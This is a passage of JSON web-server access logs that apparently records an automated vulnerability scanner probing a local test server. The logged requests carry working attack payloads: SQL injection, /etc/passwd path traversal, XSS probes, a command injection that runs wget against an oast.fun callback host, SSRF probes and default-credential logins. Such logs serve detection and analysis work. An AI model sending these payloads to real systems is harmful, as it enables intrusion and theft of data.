HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.184","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-resources/restservices/v2/api-docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /node_modules/mqtt/test/helpers/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"&act=sync&task_number=1;wget http://c9v8h88smpv8c1ig07h04qwbdi9pqpoxj.oast.fun","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /en/php/usb_sync.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //netcore_get.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"name=ADMIN&pwd=ADMIN","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?aam-media=wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /http_header.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"name=admin&pwd=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/qards/html2canvasproxy.php?url=https://c9v8h88smpv8c1ig07h0ch6wbebxufcdx.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adminer.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.inc HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.000","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.187","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"http:","request":"POST /auth/tokens HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_adminer.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/28 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.189","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/nobody/Machine.cgi?action=get_capability HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adminer/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/29 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.188","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.well-known/apple-app-site-association HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/30 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /js../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /well-known/apple-app-site-association HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/31 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apple-app-site-association HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/httptrace HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.197","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/32 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /img../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"icl_post_action=save_theme_localization&locale_file_name_en=EN\x22>\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/33 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"{{name}}=glpi&{{password}}=glpi&auth=local&submit=Submit&_glpi_csrf_token={{token}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /front/login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/vault/auth HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/34 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"username=admin&passwd=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sess-bin/login_handler.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1/sess-bin/login_session.cgi", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /7/0/33/1d/www.citysearch.com/search?what=x&where=place%22%3E%3Csvg+onload=confirm(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/35 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CMSPages/logon.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wordpress-popup/views/admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/36 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jasperserver/login.html?error=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/37 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jasperserver-pro/login.html?error=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/38 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plus/carbuyaction.php?dopost=return&code=../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.193","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 